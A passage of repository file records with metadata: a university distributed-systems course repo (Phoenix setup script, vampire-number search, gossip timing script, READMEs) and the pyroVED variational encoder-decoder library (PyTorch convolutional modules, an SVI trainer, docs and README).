But could have solved much higher, we just didn't feel like wasting time playing\nthe waiting game.\n\n7) We didn't use \":observer.start\" and can't because we ran this on a headless VM.\n" }, { "alpha_fraction": 0.5518423318862915, "alphanum_fraction": 0.5621250867843628, "avg_line_length": 27.463415145874023, "blob_id": "3d83e7362b0316dcef3d10071f7d331b32bf7301", "content_id": "183b435c71146e5480793ba0193a51ada7344c16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1167, "license_type": "no_license", "max_line_length": 82, "num_lines": 41, "path": "/phx", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\napt-get install -y nodejs\napt install -y npm\n\n# Postgres Install\napt-get install -y postgresql postgresql-contrib\n\n# Reset password of POSTGRES default user for ecto install.\nsudo -u postgres psql -c \"ALTER USER postgres PASSWORD 'postgres';\"\nservice postgresql restart\n\n# Phoenix Install\nmix local.hex\nmix archive.install hex phx_new 1.4.11\n\n# Install depedancies for proj4.2\ncd /vagrant/proj42\nmix deps.get\nmix deps.compile\ncd assets && npm install\nnode node_modules/webpack/bin/webpack.js --mode development\n\ncd /vagrant/proj42\nmix ecto.create\n\necho \"**************************************************\"\necho \"**************************************************\"\necho \"IGNORE ANY AND ALL ERRORS. NODE && NPM ARE GARBAGE.\"\necho \"**************************************************\"\necho \"**************************************************\"\necho \"\"\necho \"\"\necho \"-----------------------------------\"\necho \"Everything is set. 
Remember to 'cd proj42'.\"\necho \"\"\necho \"Run 'mix phx.server' to start the web server.\"\necho \"\" echo \"**NOTE:** You must restart the server anytime you update your code.\"\necho \"-----------------------------------\"\necho \"\"\necho \"\"\n" }, { "alpha_fraction": 0.4906401038169861, "alphanum_fraction": 0.51902174949646, "avg_line_length": 47.70588302612305, "blob_id": "1a33caf08842e8996305f734d3d30288a92facb3", "content_id": "50ce95a7949a8e47540c3da6787bdb1c51ab44ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3312, "license_type": "no_license", "max_line_length": 132, "num_lines": 68, "path": "/proj1/Vampire-Numbers.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Vampire Numbers\n\nProject 1: https://ufl.instructure.com/courses/379812/assignments/3984683\n\n## Ranged Search Algorithm\n\nRestricts the search values for x and y such that the range of products includes\nthe target value. 
Described by https://stackoverflow.com/a/36609331/11667368.\n\n```java\npublic class VampireNumbers {\n\n private static final long[] EMPTY = new long[0];\n\n public static long[] rangedSearch(long number) {\n long divisor = 1; //10^digits\n int[] digits = new int[10]; //number of digits available (equal to index)\n for (long temp = number; temp > 0; temp /= 10) { //loop over all digits\n divisor *= 10; //multiply by 10 for each digit\n digits[(int) (temp % 10)]++; //increment count for digit\n }\n return rangedSearch(number, divisor / 100, digits, 0, 0); //recursive start\n }\n\n private static long[] rangedSearch(long number, long divisor, int[] digits, long x, long y) {\n if (divisor < 1) { //no more digits to append\n if (x * y == number && (x % 10 != 0 || y % 10 != 0)) { //valid vampire number\n return new long[] {x, y};\n } else {\n return EMPTY;\n }\n } else {\n long[] fangs = EMPTY;\n x *= 10; //prepare x for next digit\n y *= 10; //prepare y for next digit\n long target = number / divisor; //extract the target number for x * y\n int minXd = Math.max(0, (int) (target / (y + 10) - x)); //minimum x0 digit that can reach target\n int maxXd = y != 0 ? Math.min(9, (int) ((target + 1) / y - x)) : 9; //maximum x0 digit that can reach target\n for (int xd = minXd; xd <= maxXd; xd++) {\n if (digits[xd] == 0) continue; //continue if x0 digit is unavailable\n digits[xd]--; //consume x0 digit\n long rootX = x + xd; //root of x solution for this step\n int minYd = Math.max(x == y ? xd : 0, (int) (target / (rootX + 1) - y)); //minimum y0 digit that can reach target\n int maxYd = rootX != 0 ? 
Math.min(9, (int) ((target + 1) / rootX - y)) : 9; //maximum y0 digit that can reach target\n for (int yd = maxYd; yd >= minYd; yd--) { //iterate in reverse to ensure fangs are in order\n if (digits[yd] == 0) continue; //continue if y0 digit is unavailable\n digits[yd]--; //consume y0 digit\n long[] result = rangedSearch(number, divisor / 100, digits, rootX, y + yd); //recursive call\n if (result.length > 0) { //if fangs were found\n if (fangs.length > 0) { //if there are current fangs, merge the results\n long[] temp = new long[fangs.length + result.length];\n System.arraycopy(fangs, 0, temp, 0, fangs.length);\n System.arraycopy(result, 0, temp, fangs.length, result.length);\n fangs = temp;\n } else {\n fangs = result;\n }\n }\n digits[yd]++; //free y0 digit\n }\n digits[xd]++; //free x0 digit\n }\n return fangs;\n }\n }\n\n}\n```\n" }, { "alpha_fraction": 0.7414330244064331, "alphanum_fraction": 0.763239860534668, "avg_line_length": 20.399999618530273, "blob_id": "49f1b1e441117edc12c7afbfad5e66458c583b90", "content_id": "a6b6e60b686d486c23bb72f888b62c7688e1f3d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 321, "license_type": "no_license", "max_line_length": 78, "num_lines": 15, "path": "/proj42/README.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Proj42 (4.2)\n\nThis implements a Phoenix web app (CRUD style) to handle the different actions\npreviously supported by the engine to demonstrate this system.\n\nFunctions supported are:\n\n - login/register\n - follow/unfollow\n - tweeting\n - view feed\n - query tweets\n - simulate 200 users\n\nVideo Demo: Attached to submission\n" }, { "alpha_fraction": 0.4694656431674957, "alphanum_fraction": 0.49045801162719727, "avg_line_length": 20.83333396911621, "blob_id": "42aa348e503c497ce0ee737b4585646b0461fd4c", "content_id": "ca2d456da9b59d035457cea589cce63a497cdf30", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 524, "license_type": "no_license", "max_line_length": 96, "num_lines": 24, "path": "/proj2/plot-data-generator.py", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "import subprocess\nimport re\n\ntopologies = [\n \"full\",\n \"line\",\n \"rand2D\",\n \"3Dtorus\",\n \"honeycomb\",\n \"randhoneycomb\"\n]\n\nalgo = \"gossip\"\n\nfor t in topologies:\n print(\"\\n_________________________\\n\\n {0} topology\\n_________________________\\n\".format(t))\n for num_nodes in range(1, 250):\n time = subprocess.check_output(\n [\"mix\", \"run\", \"proj2.exs\", str(num_nodes), t, algo]\n )\n\n time = time.decode(\"utf-8\").strip()\n\n print(\"{0}, {1}\".format(str(num_nodes), time))\n" }, { "alpha_fraction": 0.6785714030265808, "alphanum_fraction": 0.692307710647583, "avg_line_length": 21.6875, "blob_id": "767cc91e12b3cdf0eae92a15d6ac7d5320044f32", "content_id": "34dad174568ce218dfb3658beea2344155b0bc41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 364, "license_type": "no_license", "max_line_length": 92, "num_lines": 16, "path": "/proj3/README.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Proj2\n\n**Team Members:**\n- Robert Robillard\n- William B. Anderson\n\n**Compile With:**\n- $ mix escript.build\n- $ ./proj3 <num_nodes>\n\n**What is Working:**\n- Node insertion, updating, & lookups\n\n**What is the largest network you managed to deal with for each type of\n topology and algorithm:**\n- We were able to hit about 170 nodes before the time for lookups became too much to handle.\n\n" } ]
8
matthewcarbone/pyroVED
https://github.com/matthewcarbone/pyroVED
51e66abb15bfe29a0dda8b85f6f665c38986fb33
07c500bef9a506bea06d65ec231ef7164abc61f2
1352e81350f4a7d4453fa4ac95c81d641c2f026d
refs/heads/main
2023-07-02T03:28:37.095670
2021-07-09T22:33:02
2021-07-09T22:33:02
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5253675580024719, "alphanum_fraction": 0.532926082611084, "avg_line_length": 33.74100875854492, "blob_id": "d090c05affe614a078b2882581fe807c71662c10", "content_id": "36cea84a65d6f982018f2b97607b9dc098618123", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9658, "license_type": "permissive", "max_line_length": 82, "num_lines": 278, "path": "/pyroved/nets/conv.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nconv.py\n=========\n\nConvolutional NN modules and custom blocks\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import Union, Tuple, List\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..utils import get_activation, get_bnorm, get_conv, get_maxpool\n\nfrom warnings import warn, filterwarnings\n\nfilterwarnings(\"ignore\", module=\"torch.nn.functional\")\n\ntt = torch.tensor\n\n\nclass convEncoderNet(nn.Module):\n \"\"\"\n Standard convolutional encoder\n \"\"\"\n def __init__(self,\n input_dim: Tuple[int],\n input_channels: int = 1,\n latent_dim: int = 2,\n layers_per_block: List[int] = None,\n hidden_dim: int = 32,\n batchnorm: bool = True,\n activation: str = \"lrelu\",\n softplus_out: bool = True,\n pool: bool = True,\n ) -> None:\n \"\"\"\n Initializes encoder module\n \"\"\"\n super(convEncoderNet, self).__init__()\n if layers_per_block is None:\n layers_per_block = [1, 2, 2]\n output_dim = (tt(input_dim) // 2**len(layers_per_block)).tolist()\n output_channels = hidden_dim * len(layers_per_block)\n self.latent_dim = latent_dim\n self.feature_extractor = FeatureExtractor(\n len(input_dim), input_channels, layers_per_block, hidden_dim,\n batchnorm, activation, pool)\n self.features2latent = features_to_latent(\n [output_channels, *output_dim], 2*latent_dim)\n self.activation_out = nn.Softplus() if softplus_out else lambda x: x\n\n def forward(self, x: torch.Tensor) -> 
Tuple[torch.Tensor]:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.feature_extractor(x)\n encoded = self.features2latent(x)\n mu, sigma = encoded.split(self.latent_dim, 1)\n sigma = self.activation_out(sigma)\n return mu, sigma\n\n\nclass convDecoderNet(nn.Module):\n \"\"\"\n Standard convolutional decoder\n \"\"\"\n def __init__(self,\n latent_dim: int,\n output_dim: int,\n output_channels: int = 1,\n layers_per_block: List[int] = None,\n hidden_dim: int = 96,\n batchnorm: bool = True,\n activation: str = \"lrelu\",\n sigmoid_out: bool = True,\n upsampling_mode: str = \"bilinear\",\n ) -> None:\n \"\"\"\n Initializes decoder module\n \"\"\"\n super(convDecoderNet, self).__init__()\n if layers_per_block is None:\n layers_per_block = [2, 2, 1]\n input_dim = (tt(output_dim) // 2**len(layers_per_block)).tolist()\n self.latent2features = latent_to_features(\n latent_dim, [hidden_dim, *input_dim])\n self.upsampler = Upsampler(\n len(output_dim), hidden_dim, layers_per_block, output_channels,\n batchnorm, activation, upsampling_mode)\n self.activation_out = nn.Sigmoid() if sigmoid_out else lambda x: x\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.latent2features(x)\n x = self.activation_out(self.upsampler(x))\n return x\n\n\nclass ConvBlock(nn.Module):\n \"\"\"\n Creates a block of layers each consisting of convolution operation,\n (optional) nonlinear activation and (optional) batch normalization\n \"\"\"\n def __init__(self,\n ndim: int,\n nlayers: int,\n input_channels: int,\n output_channels: int,\n kernel_size: Union[Tuple[int], int] = 3,\n stride: Union[Tuple[int], int] = 1,\n padding: Union[Tuple[int], int] = 1,\n batchnorm: bool = False,\n activation: str = \"lrelu\",\n pool: bool = False,\n ) -> None:\n \"\"\"\n Initializes module parameters\n \"\"\"\n super(ConvBlock, self).__init__()\n if not 0 < ndim < 4:\n raise AssertionError(\"ndim must be equal to 1, 2 or 3\")\n activation = get_activation(activation)\n 
block = []\n for i in range(nlayers):\n input_channels = output_channels if i > 0 else input_channels\n block.append(get_conv(ndim)(input_channels, output_channels,\n kernel_size=kernel_size, stride=stride, padding=padding))\n if activation is not None:\n block.append(activation())\n if batchnorm:\n block.append(get_bnorm(ndim)(output_channels))\n if pool:\n block.append(get_maxpool(ndim)(2, 2))\n self.block = nn.Sequential(*block)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Defines a forward pass\n \"\"\"\n output = self.block(x)\n return output\n\n\nclass UpsampleBlock(nn.Module):\n \"\"\"\n Upsampling performed using bilinear or nearest-neigbor interpolation\n followed by 1-by-1 convolution, which an be used to reduce a number of\n feature channels\n \"\"\"\n def __init__(self,\n ndim: int,\n input_channels: int,\n output_channels: int,\n scale_factor: int = 2,\n mode: str = \"bilinear\") -> None:\n \"\"\"\n Initializes module parameters\n \"\"\"\n super(UpsampleBlock, self).__init__()\n warn_msg = (\"'bilinear' mode is not supported for 1D and 3D;\" +\n \" switching to 'nearest' mode\")\n if mode not in (\"bilinear\", \"nearest\"):\n raise NotImplementedError(\n \"Use 'bilinear' or 'nearest' for upsampling mode\")\n if not 0 < ndim < 4:\n raise AssertionError(\"ndim must be equal to 1, 2 or 3\")\n if mode == \"bilinear\" and ndim in (3, 1):\n warn(warn_msg, category=UserWarning)\n mode = \"nearest\"\n self.mode = mode\n self.scale_factor = scale_factor\n self.conv = get_conv(ndim)(\n input_channels, output_channels,\n kernel_size=1, stride=1, padding=0)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Defines a forward pass\n \"\"\"\n x = F.interpolate(\n x, scale_factor=self.scale_factor, mode=self.mode)\n return self.conv(x)\n\n\nclass FeatureExtractor(nn.Sequential):\n \"\"\"\n Convolutional feature extractor\n \"\"\"\n def __init__(self,\n ndim: int,\n input_channels: int = 1,\n layers_per_block: List[int] = None,\n 
nfilters: int = 32,\n batchnorm: bool = True,\n activation: str = \"lrelu\",\n pool: bool = True,\n ) -> None:\n \"\"\"\n Initializes feature extractor module\n \"\"\"\n super(FeatureExtractor, self).__init__()\n if layers_per_block is None:\n layers_per_block = [1, 2, 2]\n for i, layers in enumerate(layers_per_block):\n in_filters = input_channels if i == 0 else nfilters * i\n block = ConvBlock(ndim, layers, in_filters, nfilters * (i+1),\n batchnorm=batchnorm, activation=activation,\n pool=pool)\n self.add_module(\"c{}\".format(i), block)\n\n\nclass Upsampler(nn.Sequential):\n \"\"\"\n Convolutional upsampler\n \"\"\"\n def __init__(self,\n ndim: int,\n input_channels: int = 96,\n layers_per_block: List[int] = None,\n output_channels: int = 1,\n batchnorm: bool = True,\n activation: str = \"lrelu\",\n upsampling_mode: str = \"bilinear\",\n ) -> None:\n \"\"\"\n Initializes upsampler module\n \"\"\"\n super(Upsampler, self).__init__()\n if layers_per_block is None:\n layers_per_block = [2, 2, 1]\n\n nfilters = input_channels\n for i, layers in enumerate(layers_per_block):\n in_filters = nfilters if i == 0 else nfilters // i\n block = ConvBlock(ndim, layers, in_filters, nfilters // (i+1),\n batchnorm=batchnorm, activation=activation,\n pool=False)\n self.add_module(\"conv_block_{}\".format(i), block)\n up = UpsampleBlock(ndim, nfilters // (i+1), nfilters // (i+1),\n mode=upsampling_mode)\n self.add_module(\"up_{}\".format(i), up)\n\n out = ConvBlock(ndim, 1, nfilters // (i+1), output_channels,\n 1, 1, 0, activation=None)\n self.add_module(\"output_layer\", out)\n\n\nclass features_to_latent(nn.Module):\n \"\"\"\n Maps features (usually, from a convolutional net/layer) to latent space\n \"\"\"\n def __init__(self, input_dim: Tuple[int], latent_dim: int = 2) -> None:\n super(features_to_latent, self).__init__()\n self.reshape_ = torch.prod(tt(input_dim))\n self.fc_latent = nn.Linear(self.reshape_, latent_dim)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x 
= x.view(-1, self.reshape_)\n return self.fc_latent(x)\n\n\nclass latent_to_features(nn.Module):\n \"\"\"\n Maps latent vector to feature space\n \"\"\"\n def __init__(self, latent_dim: int, out_dim: Tuple[int]) -> None:\n super(latent_to_features, self).__init__()\n self.reshape_ = out_dim\n self.fc = nn.Linear(latent_dim, torch.prod(tt(out_dim)).item())\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.fc(x)\n return x.view(-1, *self.reshape_)\n" }, { "alpha_fraction": 0.7075098752975464, "alphanum_fraction": 0.7075098752975464, "avg_line_length": 24.299999237060547, "blob_id": "e3d70b8859aaf533ea30b60199a2ac132893e7d6", "content_id": "130f9b59be16314e6b2e09b2d5ecaa952d89e182", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 253, "license_type": "permissive", "max_line_length": 59, "num_lines": 10, "path": "/pyroved/models/__init__.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nVariational autoencoder and encoder-decoder models\n\"\"\"\nfrom .ivae import iVAE\nfrom .ssivae import ssiVAE\nfrom .ss_reg_ivae import ss_reg_iVAE\nfrom .jivae import jiVAE\nfrom .ved import VED\n\n__all__ = ['iVAE', 'jiVAE', 'ssiVAE', 'ss_reg_iVAE', 'VED']\n" }, { "alpha_fraction": 0.4117647111415863, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 16, "blob_id": "6f890992dece126569e26cfccf1444170e8bf4c8", "content_id": "5546a623f20a6c10c25900a2f96b7186416e4408", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17, "license_type": "permissive", "max_line_length": 16, "num_lines": 1, "path": "/pyroved/__version__.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "version= '0.2.3'\n" }, { "alpha_fraction": 0.5444698333740234, "alphanum_fraction": 0.5520520210266113, "avg_line_length": 36.09375, "blob_id": "cdf7ee55b1abcdde0583255ab516069b2e7d423d", "content_id": 
"87227ca6a15059eed8617e574a2e0705f2e6dfdd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8309, "license_type": "permissive", "max_line_length": 96, "num_lines": 224, "path": "/pyroved/trainers/auxsvi.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "from typing import Type, Optional, Union, Dict\n\nfrom collections import OrderedDict\nfrom copy import deepcopy as dc\n\nimport torch\nimport torch.nn as nn\nimport pyro\nimport pyro.infer as infer\nimport pyro.optim as optim\n\nfrom ..utils import set_deterministic_mode, average_weights\n\n\nclass auxSVItrainer:\n \"\"\"\n Stochastic variational inference (SVI) trainer for variational models\n with auxillary losses\n\n Args:\n model:\n Initialized model. Must be a subclass of torch.nn.Module\n and have self.model and self.guide methods\n optimizer:\n Pyro optimizer (Defaults to Adam with learning rate 5e-4)\n seed:\n Enforces reproducibility\n\n Keyword Args:\n lr: learning rate (Default: 5e-4)\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n\n Examples:\n\n >>> # Initialize model for semi supervised learning\n >>> data_dim = (28, 28)\n >>> ssvae = pyroved.models.ssiVAE(data_dim, latent_dim=2, num_classes=10, invariances=['r'])\n >>> # Initialize SVI trainer for models with auxiliary loss terms\n >>> trainer = auxSVItrainer(ssvae)\n >>> # Train for 200 epochs:\n >>> for _ in range(200):\n >>> trainer.step(loader_unsuperv, loader_superv, loader_valid)\n >>> trainer.print_statistics()\n \"\"\"\n\n def __init__(self,\n model: Type[nn.Module],\n task: str = \"classification\",\n optimizer: Type[optim.PyroOptim] = None,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n \"\"\"\n Initializes trainer parameters\n \"\"\"\n pyro.clear_param_store()\n set_deterministic_mode(seed)\n if task not in [\"classification\", \"regression\"]:\n raise 
ValueError(\"Choose between 'classification' and 'regression' tasks\")\n self.task = task\n self.device = kwargs.get(\n \"device\", 'cuda' if torch.cuda.is_available() else 'cpu')\n if optimizer is None:\n lr = kwargs.get(\"lr\", 5e-4)\n optimizer = optim.Adam({\"lr\": lr})\n if self.task == \"classification\":\n guide = infer.config_enumerate(\n model.guide, \"parallel\", expand=True)\n loss = pyro.infer.TraceEnum_ELBO(\n max_plate_nesting=1, strict_enumeration_warning=False)\n else:\n guide = model.guide\n loss = pyro.infer.Trace_ELBO()\n \n self.loss_basic = infer.SVI(\n model.model, guide, optimizer, loss=loss)\n self.loss_aux = infer.SVI(\n model.model_aux, model.guide_aux,\n optimizer, loss=pyro.infer.Trace_ELBO())\n self.model = model\n\n self.history = {\"training_loss\": [], \"test\": []}\n self.current_epoch = 0\n self.running_weights = {}\n\n def compute_loss(self,\n xs: torch.Tensor,\n ys: Optional[torch.Tensor] = None,\n **kwargs: float) -> float:\n \"\"\"\n Computes basic and auxillary losses\n \"\"\"\n xs = xs.to(self.device)\n if ys is not None:\n ys = ys.to(self.device)\n loss = self.loss_basic.step(xs, ys, **kwargs)\n loss_aux = self.loss_aux.step(xs, ys, **kwargs)\n return loss + loss_aux\n\n def train(self,\n loader_unsup: Type[torch.utils.data.DataLoader],\n loader_sup: Type[torch.utils.data.DataLoader],\n **kwargs: float\n ) -> float:\n \"\"\"\n Train a single epoch\n \"\"\"\n # Get info on number of supervised and unsupervised batches\n sup_batches = len(loader_sup)\n unsup_batches = len(loader_unsup)\n p = (sup_batches + unsup_batches) // sup_batches\n\n loader_sup = iter(loader_sup)\n epoch_loss = 0.\n unsup_count = 0\n for i, (xs,) in enumerate(loader_unsup):\n # Compute and store loss for unsupervised part\n epoch_loss += self.compute_loss(xs, **kwargs)\n unsup_count += xs.shape[0]\n if i % p == 1:\n # sample random batches xs and ys\n xs, ys = loader_sup.next()\n # Compute supervised loss\n _ = self.compute_loss(xs, ys, **kwargs)\n\n 
return epoch_loss / unsup_count\n\n def evaluate(self,\n loader_val: Optional[torch.utils.data.DataLoader]) -> float:\n \"\"\"\n Evaluates model's current state on labeled test data\n \"\"\"\n if self.task == \"classification\":\n return self.evaluate_cls(loader_val)\n return self.evaluate_reg(loader_val)\n\n def evaluate_cls(self,\n loader_val: Optional[torch.utils.data.DataLoader]) -> float:\n correct, total = 0, 0\n with torch.no_grad():\n for data, labels in loader_val:\n predicted = self.model.classifier(data)\n _, lab_idx = torch.max(labels.cpu(), 1)\n correct += (predicted == lab_idx).sum().item()\n total += data.size(0)\n return correct / total\n\n def evaluate_reg(self,\n loader_val: Optional[torch.utils.data.DataLoader]) -> float:\n correct = 0\n with torch.no_grad():\n for data, gt in loader_val:\n predicted = self.model.regressor(data)\n mse = nn.functional.mse_loss(predicted, gt)\n correct += mse\n return correct\n\n def step(self,\n loader_unsup: torch.utils.data.DataLoader,\n loader_sup: torch.utils.data.DataLoader,\n loader_val: Optional[torch.utils.data.DataLoader] = None,\n **kwargs: float\n ) -> None:\n \"\"\"\n Single train (and evaluation, if any) step.\n\n Args:\n loader_unsup:\n Pytorch's dataloader with unlabeled training data\n loader_sup:\n Pytorch's dataloader with labeled training data\n loader_val:\n Pytorch's dataloader with validation data\n **scale_factor:\n Scale factor for KL divergence. See e.g. https://arxiv.org/abs/1804.03599\n Default value is 1 (i.e. no scaling)\n **aux_loss_multiplier:\n Hyperparameter that modulates the importance of the auxiliary loss\n term. See Eq. 9 in https://arxiv.org/abs/1406.5298. 
Default values is 20.\n \"\"\"\n train_loss = self.train(loader_unsup, loader_sup, **kwargs)\n self.history[\"training_loss\"].append(train_loss)\n if loader_val is not None:\n eval_acc = self.evaluate(loader_val)\n self.history[\"test\"].append(eval_acc)\n self.current_epoch += 1\n\n def save_running_weights(self, net: str) -> None:\n \"\"\"\n Saves the running weights of specified neural net (e.g. \"encoder_y\")\n Usually meant for a classifier neural network\n \"\"\"\n net = getattr(self.model, net)\n state_dict_ = OrderedDict()\n for k, v in net.state_dict().items():\n state_dict_[k] = dc(v).cpu()\n self.running_weights[self.current_epoch] = state_dict_\n\n def average_weights(self,\n net: str\n ) -> Dict[int, Dict[str, torch.Tensor]]:\n \"\"\"\n Updates the selected neural net with an averaged weights\n \"\"\"\n net = getattr(self.model, net)\n net.load_state_dict(average_weights(self.running_weights))\n\n def print_statistics(self) -> None:\n \"\"\"\n Print training and test (if any) losses for current epoch\n \"\"\"\n e = self.current_epoch\n if len(self.history[\"test\"]) > 0:\n if self.task == \"classification\":\n template = 'Epoch: {} Training loss: {:.4f}, Test accuracy: {:.4f}'\n else:\n template = 'Epoch: {} Training loss: {:.4f}, Test MSE: {:.4f}'\n print(template.format(e, self.history[\"training_loss\"][-1],\n self.history[\"test\"][-1]))\n else:\n template = 'Epoch: {} Training loss: {:.4f}'\n print(template.format(e, self.history[\"training_loss\"][-1]))\n" }, { "alpha_fraction": 0.5685320496559143, "alphanum_fraction": 0.5685320496559143, "avg_line_length": 25.23404312133789, "blob_id": "af6a59c8dcaf5e511435dc3de63663263559dd89", "content_id": "8fcc9c23f475f85c8ecff662891242a670437699", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1233, "license_type": "permissive", "max_line_length": 66, "num_lines": 47, "path": "/docs/source/models.rst", "repo_name": 
"matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "pyroVED models\n==============\n\nInvariant Variational Autoencoder\n----------------------------------\n.. autoclass:: pyroved.models.iVAE\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n\nJoint Invariant Variational Autoencoder\n---------------------------------------\n.. autoclass:: pyroved.models.jiVAE\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n\nSemi-Supervised Invariant Variational Autoencoder (Classification)\n------------------------------------------------------------------\n.. autoclass:: pyroved.models.ssiVAE\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n \nSemi-Supervised Invariant Variational Autoencoder (Regression)\n--------------------------------------------------------------\n.. autoclass:: pyroved.models.ss_reg_iVAE\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n\nVariational Encoder-Decoder\n---------------------------\n.. 
autoclass:: pyroved.models.VED\n :members:\n :inherited-members:\n :undoc-members:\n :member-order: bysource\n :show-inheritance:\n" }, { "alpha_fraction": 0.7674232125282288, "alphanum_fraction": 0.7719626426696777, "avg_line_length": 51.74647903442383, "blob_id": "3aa3ff37c63253baa6c293906127e755f026b080", "content_id": "1138b76398eec66caf8e8bc9073971e6362c3aeb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3745, "license_type": "permissive", "max_line_length": 450, "num_lines": 71, "path": "/README.md", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "# pyroVED\n\n---\n[![build](https://github.com/ziatdinovmax/pyroVED/actions/workflows/actions.yml/badge.svg)](https://github.com/ziatdinovmax/pyroVED/actions/workflows/actions.yml)\n[![codecov](https://codecov.io/gh/ziatdinovmax/pyroVED/branch/main/graph/badge.svg?token=FFA8XB0FED)](https://codecov.io/gh/ziatdinovmax/pyroVED)\n[![Documentation Status](https://readthedocs.org/projects/pyroved/badge/?version=latest)](https://pyroved.readthedocs.io/en/latest/README.html)\n[![PyPI version](https://badge.fury.io/py/pyroved.svg)](https://badge.fury.io/py/pyroved)\n\npyroVED is an open-source package built on top of the Pyro probabilistic programming framework for applications of variational encoder-decoder models in spectral and image analyses. 
The currently available models include variational autoencoders with translational, rotational, and scale invariances for unsupervised, class-conditioned, and semi-supervised learning, as well as *im2spec*-type models for predicting spectra from images and vice versa.\nMore models to come!\n\n<p align=\"center\">\n <img src=\"misc/mnist.png\" width=\"95%\" title=\"pyroved_ivae\">\n<p align=\"justify\">\n\n## Documentation and Examples\n\nThe documentation of the package content can be found [here](https://pyroved.readthedocs.io/).\n \nThe easiest way to start using pyroVED is via [Google Colab](https://colab.research.google.com/notebooks/intro.ipynb), which is a free research tool from Google for machine learning education and research built on top of Jupyter Notebook. The following notebooks can be executed in Google Colab by simply clicking on the \"Open in Colab\" icon:\n\n* Mastering the 1D shifts in spectral data [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/master/examples/shiftVAE.ipynb)\n\n* Disentangling image content from rotations [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/master/examples/rVAE.ipynb)\n\n* Learning (jointly) discrete and continuous representations of data [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/main/examples/jrVAE.ipynb)\n\n* Semi-supervised learning from data with orientational disorder [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/main/examples/ssrVAE.ipynb)\n\n* im2spec: Predicting 1D spectra from 2D images [![Open In 
Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/ziatdinovmax/pyroVED/blob/main/examples/im2spec_VED.ipynb) \n\n## Installation\n\n#### Requirements\n* python >= 3.6\n* [pytorch](https://pytorch.org/) >= 1.8\n* [pyro-ppl](https://pyro.ai/) >= 1.6\n\nInstall pyroVED using pip:\n\n```bash\npip install pyroved\n```\n\n#### Latest (unstable) version\n\nTo upgrade to the latest (unstable) version, run\n\n```bash\npip install --upgrade git+https://github.com/ziatdinovmax/pyroved.git\n```\n\n## Reporting bugs\nIf you found a bug in the code or would like a specific feature to be added, please create a report/request [here](https://github.com/ziatdinovmax/pyroVED/issues/new/choose).\n \n \n## Development\n\nTo run the unit tests, you'll need to have a pytest framework installed:\n\n```bash\npython3 -m pip install pytest\n```\n\nThen run tests as:\n\n```bash\npytest tests\n```\n\nIf this is your first time contributing to an open-source project, we highly recommend starting by familiarizing yourself with these very nice and detailed contribution [guidelines](https://github.com/firstcontributions/first-contributions).\n" }, { "alpha_fraction": 0.5505274534225464, "alphanum_fraction": 0.5578657984733582, "avg_line_length": 34.16666793823242, "blob_id": "fae422fde5f52b83eaf98b11477576183f1dad4c", "content_id": "ac0339d297e6c674da7e3fd73dc92e9c4955dad9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6541, "license_type": 